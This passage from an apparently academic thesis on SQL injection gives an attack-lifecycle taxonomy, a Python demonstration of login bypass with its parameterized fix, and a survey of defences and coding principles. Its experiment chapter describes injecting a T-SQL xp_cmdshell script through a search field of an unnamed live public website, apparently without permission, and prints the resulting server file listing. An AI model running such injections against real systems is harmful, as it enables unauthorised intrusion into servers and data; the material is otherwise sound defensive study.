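conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cret')")

payload = "' OR '1'='1"
bypassed = login_concatenated(conn, "admin", payload)
rejected = login_parameterized(conn, "admin", payload)

print(bypassed, rejected)
```

With the concatenated version the WHERE clause becomes login = 'admin' AND password = '' OR '1'='1', which is true for every row, so a match is returned without the password. The parameterized version compares the payload as plain text and finds nothing.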

4 Taxonomy Formulation
The proposed taxonomy takes into account the lifecycle of SQL Injection attacks and the
inherent methodologies of each step as per the survey of existing techniques presented
earlier. This taxonomy is kept at a high level, as the specifics of each implementation will
vary according to the conditions and the skills of the attacker. The following diagram
is intended to offer an easy-to-use graphical representation of the taxonomy:
Figure 31 - Taxonomy of SQL Injection Attacks
[Diagram: the six steps of the attack lifecycle and the elements of each step]
Setting the Objective: Access Control, Availability, Authenticity, Confidentiality, Privacy, Secrecy, Integrity, Auditability
Choosing the Method: data manipulation, authentication bypass, information retrieval, information manipulation, information fabrication, information deletion, external datasources, OS manipulation, file upload
Examining Prerequisites: subqueries, JOIN, UNION, multiple statements, comments, error messages, type casting, variable morphism, stored procedures, string concatenation, INTO, weak policies & principles
Poking for Vulnerabilities: unvalidated input, error msg feedback, time delays, uncontrolled var size, type casting & morphism, single quotes, discovering DB objects, offline research
Choosing Means: Web Forms, URL Header, HTTP Header, Cookie Poisoning
Designing the Query: design the final query for perpetrating the attack
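For readers who prefer a machine-readable form, the diagram can be held in a small nested structure, much like the XML-like representation mentioned earlier. This is only a sketch: the step and element names are copied from Figure 31, while the TAXONOMY mapping and the helper functions step_of and is_mutually_exclusive are assumptions introduced for illustration.

```python
# Steps and elements as they appear in Figure 31.
TAXONOMY = {
    "Setting the Objective": [
        "Access Control", "Availability", "Authenticity", "Confidentiality",
        "Privacy", "Secrecy", "Integrity", "Auditability",
    ],
    "Choosing the Method": [
        "data manipulation", "authentication bypass", "information retrieval",
        "information manipulation", "information fabrication",
        "information deletion", "external datasources", "OS manipulation",
        "file upload",
    ],
    "Examining Prerequisites": [
        "subqueries", "JOIN", "UNION", "multiple statements", "comments",
        "error messages", "type casting", "variable morphism",
        "stored procedures", "string concatenation", "INTO",
        "weak policies & principles",
    ],
    "Poking for Vulnerabilities": [
        "unvalidated input", "error msg feedback", "time delays",
        "uncontrolled var size", "type casting & morphism", "single quotes",
        "discovering DB objects", "offline research",
    ],
    "Choosing Means": [
        "Web Forms", "URL Header", "HTTP Header", "Cookie Poisoning",
    ],
    "Designing the Query": [
        "design the final query for perpetrating the attack",
    ],
}

def step_of(element):
    """Return the lifecycle step(s) under which an element is filed."""
    return [step for step, elements in TAXONOMY.items() if element in elements]

def is_mutually_exclusive(taxonomy):
    """True when no element is filed under more than one step."""
    seen = [e for elements in taxonomy.values() for e in elements]
    return len(seen) == len(set(seen))

print(step_of("Cookie Poisoning"))
print(is_mutually_exclusive(TAXONOMY))
```

A structure of this kind makes it straightforward to check the mutual exclusivity requirement mechanically, at least at the level of element names.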

The following table presents a more verbose reading of the taxonomy:
# Name Description
1 Setting the Objective
First step of the attack lifecycle. The attacker implicitly
or explicitly determines which security services will be
compromised.
Services under threat:
Access Control, Availability, Authenticity,
Confidentiality, Privacy, Secrecy, Integrity, Auditability
2 Choosing the Method
Once the collection of objectives is established and
the list of security services formulated, the attacker
must then choose the collection of methods that will
serve to address the objectives previously set-out
2.1 Data Manipulation
Deals with the possibility to retrieve, change, fabricate
or delete data in a database through the use of SQL
commands and can potentially extend to the full DML
(Data Manipulation Language) stack
2.2 Authentication Bypass
An attacker may use this method to pretend to be a
legitimate user by bypassing an authentication
mechanism and be granted that user’s privileges.
2.3 Information Retrieval
Attackers can try to manipulate or execute SELECT
statements and similar in order to get access to
information beyond their privileges.
2.4 Information Manipulation
Attackers can try to manipulate or execute UPDATE
statements and similar in order to alter information
beyond their privileges.
2.5 Information Fabrication
Attackers can try to manipulate or execute INSERT
statements and similar in order to fabricate information
beyond their privileges.
2.6 Information Deletion
Attackers can try to manipulate or execute DELETE or
DROP statements and similar in order to delete
information beyond their privileges
2.7 Extending to Other Data Sources
Through the use of distributed queries, the attacker
can extend the attack to virtually any OLE DB/ODBC
compliant data source.
2.8 Extending to the Operating System
Command execution is a method that enables an
attacker to execute SQL specific system commands
through the RDBMS and may even allow the attacker
to take control over other host computers in the
network
2.9 Uploading Files
Once an attacker has gained adequate privileges on
the SQL Server, he may desire to upload files to the
server, e. g. an executable file, in order to execute
complex operations at the operating system level as
well as at the network environment level.
3 Examining Prerequisites
Different SQL Injection attack methods have different
prerequisites in order to be carried-out. These can be
related to query execution properties, or specific
features embedded on the RDBMS, or even the
topology of the surrounding corporate network
environment.
3.1 Subqueries
Sub-querying enables nesting of SQL statements.
Subqueries are achieved by means of sub-selects,
which are nothing more than multiple SELECT
statements used together. They can potentially offer
the means to piggy-back a malicious query.
3.2 JOIN
The JOIN clause makes it possible to combine
information from multiple tables, including tables from
external data sources, and yield a consolidated
resultset. JOINs can provide the means to access
unintended information sources and combine them in
a single resultset.
3.3 UNION
The UNION set operator can be used to combine
multiple resultsets from multiple SELECT queries into
a single consolidated resultset.
3.4 Multiple Statements
Refers to the ability of allowing the execution of
multiple SQL statements, where each statement is
separated by a delimiter, e.g. a semicolon or the GO
separator.
3.5 Comments
The ability to comment out parts of an SQL
statement, meaning that the RDBMS will not take
notice of the SQL syntax followed by a comment
symbol, will provide for syntax consistency after the
carrier query has been injected.
3.6 Error Messages
Error messages can provide invaluable information
about a system’s inner structures and about whether
an injection attack is making progress, especially if
error messages are propagated all the way to the
frontend. These can be raised by the RDBMS or by any
server-side script or program, or even by the injection
itself as a means of outputting information.
3.7 Implicit Type Casting
Implicit type casting can happen at the RDBMS level
as well as at the business layer level. Implicit conversions
are those conversions that occur without specifying
either the CAST or CONVERT function. Explicit
conversions are those conversions that require the
CAST or CONVERT function to be specified. An
attacker could use type casting to his advantage and
fool the application and the underlying RDBMS.
3.8 Variable Morphism
Variable morphism is closely related to implicit type
casting. Whereas in implicit casting a variable’s type
remains unaltered as it is strongly typed, when
variables allow morphism, instead of casting the value
to the variable’s type, the type of the variable changes
to accommodate the type of the value.
3.9 Stored Procedures
Supported by all commercial RDBMSs, they allow the
execution of system or database commands and SQL
subroutines in the RDBMS. The potential of these
procedures is directly connected to the functions they
can perform.
3.10 String Concatenation for Building Dynamic Statements
If developers use a string concatenation approach in
order to build dynamic statements, there is a pretty
good chance the attacker can manipulate it to his
advantage, whereas using a parameterized approach
makes things a whole lot more difficult.
3.11 INTO
The INTO clause can be used to redirect query
yieldings to different sources other than the regular
query output stream. If used with the OUTFILE
instruction, it is possible to output contents to a file.
3.12 Weak Policies and Principles
Principles and policies play an important role in
defending against SQL Injection attacks, e.g. the least
privilege principle, as they can determine the success
or failure of many exploitation attempts.
4 Poking for Vulnerabilities
Assessing which vulnerabilities are present will serve
to steer the attack in terms of determining if the
prerequisites for specific attack methods are met,
which in turn will relate back to the attack objectives
previously formulated.
4.1 Unvalidated Input
Is in essence what makes SQL Injection possible.
Unchecked parameters to SQL queries that are
dynamically built can be used in SQL Injection attacks.
4.2 Error Message Feedback
Error messages that are generated by the RDBMS or
by other server-side component may be bubbled-up
to client-side. While these messages can be useful
during development for debugging purposes, they
can also constitute risks to the application since
attackers may use them to obtain information about
database or script structure in order to construct their
attack. Injecting an expression to cause a syntax error
is the most commonly used means for assessing it.
4.3 Time Delays
If runtime error messages are concealed from the
end-user, the attacker must have some kind of
positive feedback whenever he is poking around for
vulnerabilities. Forcing a delayed response will
implicitly indicate a successful injection attack.
4.4 Type Casting & Variable Morphism
Entrypoints that deal with numeric values are a good
place to start assessing the application’s proneness to
implicit type casting and variable morphism since it is
possible to exploit a query simply by using basic
arithmetic operations.
4.5 Single Quotation Marks in Building Dynamic Queries
If the application or one of its stored procedures uses
string concatenation for constructing dynamic SQL
statements, then there is a pretty good chance single
quotation marks on the carrier query can be
manipulated in order to piggy-back a second
statement.
4.6 Discovering Database Objects
The database structure is kept hidden. Uncovering the
inner structure of the RDBMS will require the use of
DML statements and the DDL stack as well.
Discovering the database structure is therefore the
last step of poking for vulnerabilities as it will need to
combine several of the atomic vulnerabilities and
methods previously assessed.
4.7 Offline Research
Many Web and regular applications are not
developed in house but are software packages more
or less distributed across the globe. An attacker could
build a similar lab environment at home and, in that
comfort, take as much time as needed
to study and prepare the attack without
taking any risks.
5 Choosing Means
Once the attack’s objectives are set out, tools ready,
prerequisites met, and weak spots targeted, the
attacker must choose the means to deliver the
attack’s payload via some kind of frontend
entrypoint.
5.1 Web Form Manipulation
An attacker can use forms, the typical frontend of a
tiered application, to enter parts of SQL statements
such as SQL keywords, control characters or data in
order to manipulate underlying application server-side
scripts or programs.

5.2 URL Header Manipulation
Similar to Web form manipulation, only that the
form’s contents are sent via a human-readable
querystring as part of the Web resource URL.
5.3 HTTP Header Manipulation
Whenever an HTTP request or response is issued,
a set of headers envelops the message. If
any HTTP header is used in the
construction of a dynamic SQL statement, then the
headers can be manipulated in order to
perform a SQL Injection attack.
5.4 Cookie Poisoning
Cookies are text files stored by the browser on the
user’s hard disk on behalf of the Web application. It is
very common to authenticate users using cookies.
Because their role is primarily to hold user-specific
data with direct consequences for the contents to be
rendered, it is almost guaranteed that information
stored in cookies will participate in the formulation of
dynamically generated SQL statements.
6 Designing the Query
Designing the query is the final step in the chain of
iterative steps. By the time the final query is to be
designed, the hacker has a clear idea of the objective
he wishes to accomplish; he has researched and
assessed several attack methods that can be of some
use, ascertained which prerequisites are present,
tested for weaknesses, and chosen the delivery method
for the attack. It is now time to design a query that
follows the proper structure of an SQL query
expected by the RDBMS, while accounting for all the
constraints imposed by the environment.
Table 5 - Taxonomy of SQL Injection Attacks
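As an illustration of entry 4.4 in the table above, the following minimal Python sketch shows why a numeric entrypoint that is concatenated into a query reveals itself when fed a basic arithmetic expression, and how a strict type conversion closes it. It uses the standard sqlite3 module with an in-memory database as a stand-in for the RDBMS; the table `items`, its rows and the function names are assumptions made here for illustration only.

```python
import sqlite3

def make_db():
    """Create a throwaway in-memory database with three rows (illustrative data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [(1, "alpha"), (2, "beta"), (3, "gamma")])
    return conn

def lookup_concatenated(conn, raw_id):
    """Vulnerable pattern: the raw value becomes part of the SQL text."""
    query = "SELECT name FROM items WHERE id = " + raw_id
    return [row[0] for row in conn.execute(query)]

def lookup_validated(conn, raw_id):
    """Safer pattern: convert to int first, then bind the value as a parameter."""
    item_id = int(raw_id)  # raises ValueError for input such as "3-1"
    return [row[0] for row in conn.execute(
        "SELECT name FROM items WHERE id = ?", (item_id,))]

if __name__ == "__main__":
    conn = make_db()
    # The expression is evaluated by the database engine, not treated as data.
    print(lookup_concatenated(conn, "3-1"))
    try:
        lookup_validated(conn, "3-1")
    except ValueError:
        print("rejected: not an integer")
```

If the concatenated lookup returns the row whose id equals the result of the arithmetic, the input is being interpreted as SQL rather than as a value, which is exactly the symptom the table entry describes.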

Chapter 5
EXPERIMENTING
Experimentation is a classic form of research that owes much to
the Natural Sciences, although it features strongly in social
science research, particularly psychology. Experimentation
is all about cause-effect and is the pinnacle of positivistic
research. In positivistic research, also known as the
Scientific Method, a model for describing the problem is
formulated and its variables isolated through environment
control, e.g. samples.
The purpose of this chapter is to build internal validity by experimenting against a
real test subject in a production environment. Experimenting will be conducted
using the proposed taxonomy as the basis for perpetrating the attack, iteratively
following the steps described in the attack lifecycle.

experimenting •
REAL ENVIRONMENT TEST
Probably the best way to clarify the research topic further and validate both the
taxonomy and the survey of existing techniques is to step down from the conceptual level and
move on to a real working example. For this purpose a simple Web application published
on the Internet was chosen during casual Web surfing; no particular selection
method was used apart from the fact that it was very easy to determine the application’s
proneness to SQL Injection. The following page, whose URL will not be revealed for ethical
reasons, was accessed in April 2006 and is a portal intended for scholars looking for
research fellowships and grants in various scientific fields.
Figure 32 - Public Page Used for Proof of Concept

One simple and quick way to determine if a page is prone to SQL Injection is to type in
something that would deliberately result in a syntax error in the hope that some error
message is displayed. Hackers know error messages can be quite handy and a prolific
source of invaluable information. Single quotation marks are an excellent choice to start
with. The following line was typed in the free text search field:
Figure 33 - Probing for Possible Injection Entrypoints Via a Web Page
For the injection to succeed it must make a round-trip to the middle-tier which is exactly
what happens once the search button is pressed, resulting in the following output:
Figure 34 - Error Message Raised by a Successful SQL Injection Attack

The error message indicates the injection was successful and that it caused a syntax error.
Moreover, the amount of additional information revealed by the error message is huge.
Merely by reading it, it is possible to determine the RDBMS used by the application, which
in this case is Microsoft SQL Server. This information can be applied to narrow the scope
of the attacks and exploit the particularities of that RDBMS, for example by writing the
attacks in the SQL dialect of that particular system in order to
widen the options available. Furthermore, the error message states that the middle-tier
components are accessing the database via an abstraction layer called ODBC, thus
providing the hacker with additional data that could be used to exploit known
vulnerabilities of the ODBC provider for Microsoft SQL Server. It even reveals which line
of which Web resource raised the error. Not bad for one not so trivial search keyword!
But things could get worse! Using DML commands it would be a very simple task to alter
the database contents, or retrieve them without the limitations imposed by the business
rules of the application. But things could really get a whole lot worse! What if the attack
uses the database security context to gain access to the server’s operating system and
resources? And from there interact with other corporate systems such as legacy systems?
In this proof of concept nothing so grave will be performed, as only the list of files in the
root folder of the C drive will be retrieved using the following T-SQL script:

CREATE TABLE #temp(x varchar(255))
Insert Into #temp
Exec Master..xp_cmdshell 'Dir C:'
Declare @line as varchar(255)
Declare @ErrorLine as varchar(5000)
Set @ErrorLine=''
Declare FileList Cursor FAST_FORWARD For
Select * from #temp where substring(x,3,1)='-'
Open FileList
Fetch Next From FileList into @line
While @@Fetch_Status = 0
Begin
    Set @line = ltrim(substring(@line,18,255))
    If substring(@line,1,5)='<DIR>'
        Set @line = 'D>' + ltrim(substring(@line,6,255))
    Else
        Set @line = substring(@line, CharIndex(' ',@line) + 1, 255)
    Set @ErrorLine = @ErrorLine + @line + ','
    Fetch Next From FileList into @line
End
Close FileList
Deallocate FileList
Drop Table #temp
RaisError (@ErrorLine,16,1)

Since it was possible to determine that the database management system is Microsoft
SQL Server thanks to a very enlightening error message, a whole new set of options is
now available. This statement applies to any RDBMS as long as the attacker knows which
goodies that particular RDBMS makes available. In this case, the above script takes
advantage of an MS SQL Server stored procedure to execute operating system commands.
Since the Web application used herein displays unhandled error messages, the script
takes advantage of that fact and raises an error containing the desired information.
Conveniently, the Web application will then render the error message as part of the
output. The only challenge remaining is to inject this script into the Web application’s
middle-tier without breaking the resulting query syntax. However, this step requires some
imagination, as some guessing of the backend query structure is required. Let’s make an
educated guess and assume the backend query is similar to this:
Select * From someTable Where contents like '%userInput%'

So the script will be placed within the WHERE clause of the query. Therefore, if the
following value were input into the search textbox, the query structure and syntax would
remain unaltered:
Select * From someTable Where contents like '%';TheScript;--%'

The semicolon separates statements, so several of them can be executed in a single batch, whereas the
double hyphen indicates that everything after it is a comment and therefore should be
ignored. So the input value on the page would be the portion ';TheScript;-- of the query
above (displayed in red in the original), where
“TheScript” should be interpreted as the above-mentioned script. Because the field
length of the page does not permit so many characters, one final step is still required. The
HTML page must be saved locally and edited, let’s say using Notepad, and the field
length increased in order to accommodate the script’s length. Once the local version of
the page is filled in with the script and posted back to the Web server, here is the result:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]
1.asp,D>AS2000SP4,blah.cz,D>CA_LIC,D>compaq,D>CPQSYSTEM,
D>DBASQL,DIY_TEMPCOMMAND.log,D>Documents and Settings,down.vbs,
D>ePOAgent,Hacked.txt,instalacao_fct.bak,D>lic98_win_eng_1-61-12,
net_sql.txt,odbcconf.log,PAX,D>PerfLogs,D>Program Files,D>QUARANTINE,
setup.log,siweb_cmd.log,D>TEMP,website.mdf,website_20040414,
WEBSITE_db_200511091200.BAK,D>WINNT,D>WUTemp,~,
/cache/cache.area=6&object=9.asp, line 379
Figure 35 - List of Local Files Obtained via an Error Raised by a Successful SQL Injection Attack
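The effect of the injected value on the guessed backend query can be reproduced at the string level. The following Python sketch (standard library only) is an illustration under stated assumptions: `someTable` and `contents` are the guessed names used in this section, the sample row and the function names are invented here, and SQLite stands in for the real RDBMS. It only builds and prints the concatenated statement for the placeholder `TheScript`, and then issues the same search with a bound parameter, where the input is treated purely as data.

```python
import sqlite3

def build_search_query(user_input):
    """Mimics the guessed backend: the input is concatenated into the LIKE pattern."""
    return "Select * From someTable Where contents like '%" + user_input + "%'"

def search_parameterized(conn, user_input):
    """The same search with the input bound as a parameter instead of concatenated."""
    pattern = "%" + user_input + "%"
    return conn.execute(
        "Select * From someTable Where contents like ?", (pattern,)).fetchall()

if __name__ == "__main__":
    # With ordinary input the statement keeps its intended shape.
    print(build_search_query("grants"))
    # With the crafted input the quote closes the string early, the semicolons
    # delimit a second statement, and the double hyphen comments out the rest.
    print(build_search_query("';TheScript;--"))

    conn = sqlite3.connect(":memory:")  # illustrative stand-in database
    conn.execute("CREATE TABLE someTable (contents TEXT)")
    conn.execute("INSERT INTO someTable VALUES ('research grants in physics')")
    print(search_parameterized(conn, "grants"))
    # The crafted value is only searched for as text; it is never executed.
    print(search_parameterized(conn, "';TheScript;--"))
```

Note that in the parameterized form the characters % and _ supplied by the user still act as LIKE wildcards; binding prevents the input from changing the statement's structure, not its pattern semantics.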

The list of files was displayed as part of a database error and embedded in the output
page produced by the middle-tier components. This simple attack was successfully
perpetrated without the use of any tools, and 28 lines of code were all it took to gain
access to the operating system of a server sitting in the best-protected network
zone (see Figure 6 - Typical Web Infrastructure Layout on page 34) and bypass all network
security devices in place, leaving no obvious trace of activity behind. The damage inflicted
could easily be extended simply by manipulating the operating system shell command in
the script. Creating new users, accessing classified data, and getting into other corporate
systems are only a few extra lines of code away. The examples demonstrated herein only
touch the tip of the iceberg. They could be avoided with little effort
from the development teams, but this can only be accomplished if developers and
solution architects are aware of this threat and understand the impact of their actions.

Chapter 6
DEFENSIVE TACTICS
Security is all about managing risks, and some risks never go
away completely. Whereas some high-profile risks such as
buffer overflows have pretty straightforward solutions,
the easiest classes of attacks to implement – particularly
social engineering and insider attacks – do not. Though
SQL Injection is amongst these classes, there is a lot that
can still be done.
In this chapter some of the soundest countermeasures for SQL Injection
attacks are described. Yet, any existing security principle could potentially
contribute to safeguarding against these attacks. For that reason, this chapter
opts for a more cause-effect approach and promotes those strategies that offer a
pragmatic view for preventing or minimizing SQL Injection attacks.

defensive tactics •
TECHNOLOGY-BASED
Security is all about managing risks, and some risks never go away completely. Whereas
some high-profile risks such as buffer overflows have pretty straightforward solutions, the
easiest classes of attacks to implement – particularly social engineering and insider attacks
– do not (Howard & LeBlanc 2003). This statement can also be applied to SQL Injection,
as this type of attack is in general harder to detect and protect against (Landsmann &
Strömberg 2003;OWASP 2006;Spett 2002), not to mention its growing popularity, due
in great measure to the increasing growth of database-enabled Web applications
(Buehrer, Weide, & Sivilotti 2005).
The breadth and depth of the problem as outlined by the literature portray SQL Injection as
a big iceberg requiring a multi-disciplinary approach if a unifying solution is to be found.
Nonetheless, a lot has already been done in the field of prevention, and even though it is
not this work’s goal to approach security, some of the soundest countermeasures
will be enumerated herein for reference.

Huang et al. (2004) propose WebSSARI (Web application Security by Static Analysis and
Runtime Inspection), which consists of a tool that performs a lattice-based static analysis of
the Web application code. Although it only supports PHP, it could be extended to
incorporate the grammar of other programming languages. Similarly, Scott and Sharp
(2002) have proposed a high-level static input validation mechanism that blocks
malicious input to Web applications. Whilst approaches based on static code analysis
offer protection through the enforcement of strictly defined policies, they fail to assess
the code itself or to identify the actual weaknesses (Huang et al. 2003). Nonetheless,
static analysis techniques, where the code is analysed at design time by a set of tools,
have been successfully attempted for ensuring security for legacy software. Huang et al.
(2003) also agree this technique can be applied to Web application code, for instance,
ASP or PHP scripts. However, it fails to adequately address the runtime behaviour of the
Web application, a direct consequence of the massive number of runtime interactions
that connect the various components. Furthermore, it is generally agreed that these
runtime interactions are what make Web application security such a challenging task
(Huang et al. 2003;Joshi et al. 2001;Scott & Sharp 2002). In addition, the success of
static analysis techniques depends on the strictness and accuracy of the underlying
policies, which in turn cannot outsmart the inventory of pretheorized or preunderstood
points of attack – LeBlanc’s (2003) second principle on why the advantage is always on
the hacker’s side.
Aware of this limitation, Huang et al. (2003) propose a security assessment tool for Web
applications that takes into account the runtime behaviour of the application. The
biggest challenge of applying dynamic analysis to Web applications lies in providing
efficient interface mechanisms, since Web applications interact with users that stand
behind Web browsers. They propose a black-box crawler to address the interface issue
and pinpoint all possible data entrypoints by reverse-engineering the Web application.
Then, with the help of a self-learning injection knowledge base, fault injection techniques
are applied to detect SQL Injection vulnerabilities. This approach does have merit and
provides what is probably at present the best automated method for detecting
weaknesses. Still, it stumbles on a very harsh reality. The fact that there are unlimited variations
of SQL Injection attacks (Álvarez & Petrovic 2003) indicates that the proposed
“self-learning injection knowledge base” must be really intelligent for the proposed dynamic
assessment tool to work. Unfortunately, we are still in the early days of Artificial
Intelligence.
Gaurav, Angelos, & Vassilis (2003) take a more high-level approach not centred around
SQL Injection alone, as they propose a general approach for safeguarding systems against
any type of code-injection attack. They base their studies on the observation that the
specific techniques used in each attack differ – which corroborates Álvarez’s & Petrovic’s
(2003) claim of infinite variations – but at the end of the day, they all result in the attacker
executing code of his choice, whether machine code, shell commands, SQL queries, etc.
The direct implication of this observation is that the attacker knows what “type” of code
can be injected, e.g. as in the educated guesswork performed in the «Real Environment
Test» section within the Experimenting chapter. Gaurav, Angelos, & Vassilis apply
Kerckhoffs’ principle by creating process-specific randomized instruction sets (e.g.
machine instructions) for the system executing potentially vulnerable software. Since the
attacker does not know the key for the randomization algorithm, any injected code
would be alien to the code interpreter, thus causing a runtime exception. Although this
technique provides a way to completely wipe out code-injection threats, it does have four
major issues. The first is the fact that it generates runtime exceptions, which opens room for
an easy Denial of Service (DoS) attack; hence some strong exception handling procedures
would have to be put in place. The second lies in the necessity of altering the operating system’s
kernel. While this could be accomplished, at least in theory, in reality the kernel will
only be editable for open source operating systems. Furthermore, this is an extremely
delicate and complex procedure that only elite sysadmins are qualified to implement. The
third issue is recognized by the authors themselves, as they admit the significance of the
performance penalty. As a workaround, they proposed a modified CPU, which reinforces
the not-for-common-use profile of this solution. Last but not least, carrying out
dynamically generated code on such a system without knowledge of the
randomization key would be absolutely impossible. Therefore a thorough development
cycle with several quality control and security checkpoints would be required.
Unfortunately, as established in the introductory chapter, this is not compatible with
contemporary business demands, as rapid development cycles are required in order to
face change, even though this is one of the causes of the proneness of Web applications
to SQL Injection attacks.
Barrantes, Ackley, & Forrest (2005) propose a very similar solution that basically differs in
the randomization approach. They propose a unique and private machine instruction set
for each executing program. An analogous view is also employed by Boyd & Keromytis
(2004). Their SQLrand, an instruction-set randomization for safeguarding systems against
any type of code-injection attack, only differs in the operationalization of the concept,
while the strategy remains basically the same. After careful analysis of these solutions, it
becomes clear that the same issues holding back Gaurav’s, Angelos’, & Vassilis’ (2003)
solution from being widely used also apply to any randomization technique.
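The randomization idea can be made concrete with a toy example. The Python sketch below is loosely modelled on the concept described above and is not the implementation of any of the cited authors: it assumes that the application writes its SQL keywords with a secret numeric suffix, and that a proxy placed in front of the database strips the suffix and rejects any keyword that arrives without it. The keyword list, the key format and all names are assumptions made for illustration.

```python
import re

# A deliberately small keyword list; a real parser would know the full grammar.
SQL_KEYWORDS = {"SELECT", "FROM", "WHERE", "AND", "OR", "UNION", "INSERT",
                "UPDATE", "DELETE", "DROP", "EXEC"}

# Matches either a quoted string literal or a word optionally followed by digits.
TOKEN = re.compile(r"'(?:[^']|'')*'|[A-Za-z_]+\d*")

class InjectionSuspected(Exception):
    """Raised when a standard (un-keyed) SQL keyword reaches the proxy."""

def derandomize(query, key):
    """Toy proxy: strip the key from keyed keywords, reject any bare keyword."""
    def handle(match):
        token = match.group(0)
        if token.startswith("'"):
            return token                      # string literal: data, left untouched
        if token.upper() in SQL_KEYWORDS:
            raise InjectionSuspected(token)   # keyword without the secret key
        if token.endswith(key) and token[:-len(key)].upper() in SQL_KEYWORDS:
            return token[:-len(key)]          # keyed keyword: restore standard form
        return token                          # identifier or any other word
    return TOKEN.sub(handle, query)

if __name__ == "__main__":
    key = "4821"  # hypothetical per-application secret (digits only in this sketch)
    template = "SELECT{k} * FROM{k} users WHERE{k} login='{v}'"
    print(derandomize(template.format(k=key, v="alice"), key))
    try:
        derandomize(template.format(k=key, v="x' OR 'a'='a"), key)
    except InjectionSuspected as exc:
        print("rejected, bare keyword:", exc)
```

The rejected query also illustrates the first issue raised above: every injection attempt surfaces as a runtime exception that the application must handle gracefully.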
Two very important findings have been established so far: a) static code analysis does not
introduce any performance penalty, although it cannot predict runtime behaviours and
therefore fails to provide an adequate solution; b) runtime randomization is burdensome
on machine and people and therefore cannot be widely applied as a remedy to the
problem. However, Yi & Brajendra (2004) offer an in-between solution. They propose a
data mining approach for detecting malicious transactions in an RDBMS based on the
runtime activity logs. This approach removes the burden from both machine and
people while still providing the ability to analyze the application’s runtime behaviour.
It sounds like a pretty good approach, not least because RDBMSs do perform extensive
logging of their activities; however, this is a post-event procedure. In other words, the
organization would be able to know exactly how, when, and where it had been attacked,
and from there learn, improve and possibly roll back some actions; still, the harm
would already have been done. Though Yi’s & Brajendra’s approach has academic merit, in
the everyday industry world it only serves to confirm the principle that security is by
definition reactive, whereas hacking is proactive.
As failures to provide a holistic solution to the problem accumulate, the complexity of the
attempts mounts up accordingly. Linn et al. (2004), in their paper whose title attests to this
statement, «A Multi-Faceted Defence Mechanism Against Code Injection Attacks»,
propose a host-based intrusion detection system which depends on the embedding of
semantic information into executables in order to identify the locations of legitimate
system call instructions and then “back this up using a variety of techniques, including a
novel approach to encoding system call traps into the OS kernel, in order to deter
mimicry attacks”. The applicability of this technique is reduced to lab-only work. With
regard to placing semantic information into executables, such a procedure requires access
to the code, which in the vast majority of cases is not an option, and then some deep
analysis of that code in order to determine possible entrypoints. Regarding kernel
manipulation, this procedure is not within reach of the common sysadmin and is only
applicable to open source operating systems. Finally, a “variety of techniques” does not
sound like a bullet-proof solution or something that the industry is willing to cope with.

What goes up must come down. Likewise, other sources prefer to reduce the complexity
of solving the problem to as low as possible. Waymire (2004) at Microsoft Tech-Ed 2004
blames developers for the problem and states that SQL Injection is exclusively the
outcome of poor programming techniques. He also acknowledges Microsoft’s role in the
dissemination of bad programming examples and the consequent formation of a relaxed
security culture. Over the years many of the code samples contained in all sorts of official
support documentation from Microsoft were prone to SQL Injection attacks. On the
other hand, Microsoft does deserve a lot of credit for the growing awareness of the
problem, and they are one of the pioneers in embedding countermeasures in development
frameworks. They have introduced the triple-D principle: Secure by Design, Secure by
Default, and Secure in Deployment, and they are taking it very seriously. If nowadays a
UNIX sysadmin installs Apache, the famous Web server, it will be up to him to know all
potential threats and perform hardening of the Web server. In contrast, Microsoft
Internet Information Server, Apache’s direct competitor, will be deployed with everything
closed, so the sysadmin is forced to use declarative security whenever a resource needs to
be used by the Web application. But there is more. SQL Injection and cross-site scripting
attacks are, by default, a concern of the Microsoft ASP .NET Framework 2.0. Although it
is not bullet-proof, it does provide another layer of protection. If a remote user tries to
perform a SQL Injection attack against an application written in ASP .NET, he will most
likely get an error screen such as this:

Figure 36 - SQL Injection Attack Prevented by the Microsoft ASP .NET Framework
Security lockdown has also been applied to the RDBMS level. Microsoft SQL Server 2005
implements the “secure by default principle” so, by default, if someone tries to execute
the xp_cmdshell command or use an OPENROWSET statement, the following error
message will be thrown:
Figure 37 - Exploitation Prevented by the “Secure by Default” Principle on MS SQL Server 2005

By now it is clear that SQL Injection is a lot more than a technology problem (although
there are technological countermeasures that can offer some protection): it also
involves people, procedures and behaviours. Hence, an effective-enough countermeasure
must take into account both technical and human aspects of the problem. Typically, this
is when principles become handy tools for problem solving. Therefore this researcher
decided to stop pursuing any fancy techie solution holding “The Answer” and took
the path that led him to principles that could be of some use in this context.

PRINCIPLE-BASED
Literature recurrently refers to the improvement of programming techniques as a means
to counteract the SQL Injection threat (Álvarez & Petrovic 2003;Anley 2002a;Anley
2002b;Boyd & Keromytis 2004;Cerrudo 2002;Halfond & Orso 2005a;Huang et al.
2004;Huang et al. 2003;Landsmann & Strömberg 2003;Pietraszek & Berghe 2005;Spett
2002;Waymire 2004). All too often, the attack involves escaping single quotes in a
dynamically-generated query processed at the business rules layer (Anley 2002b;Boyd &
Keromytis 2004;Cerrudo 2002;Landsmann & Strömberg 2003) as in this example:
Select * From Users Where Login='<user input>' and PWD='<user input>'
If the remote user, by means of a Web page containing a form with two fields used in the
dynamic construction of the above query, inputs this expression in both fields:
X' OR 'A' = 'A
the SQL statement to be executed against the RDBMS will be equal to:
Select * From Users Where Login='X' OR 'A'='A' and PWD='X' OR 'A'='A'
The WHERE clause of this statement will always evaluate to true, regardless of the values
for the login and password stored in the database, consequently allowing the attacker
to bypass the authentication mechanism implemented by the Web application. This leads
to the first and most basic principle found in the literature (Anley 2002b;Finnigan
2002;Kost 2003;Landsmann & Strömberg 2003;Maor & Shulman 2004;McDonald
2002;Sam M.S. 2005;SecuriTeam.com 2002).

PRINCIPLE I
ALWAYS REPLACE SINGLE QUOTES WITH DOUBLE SINGLE QUOTES WHENEVER USER INPUT IS RECEIVED
The idea is to prevent the attacker from escaping single quotes in a text-based input
value of a query. The SQL-92 standard indicates that double single quotes should
be used in a statement whenever a single quote is to be interpreted as part of a
string. So if someone wanted to insert the value LEVI’S in a database, the actual
value in the query would have to be LEVI’’S with two single quotes. In case an
attacker tries to use a value containing single quotes in the hope of escaping the
sequence of single quotes in the base query, his attempt would be frustrated, as
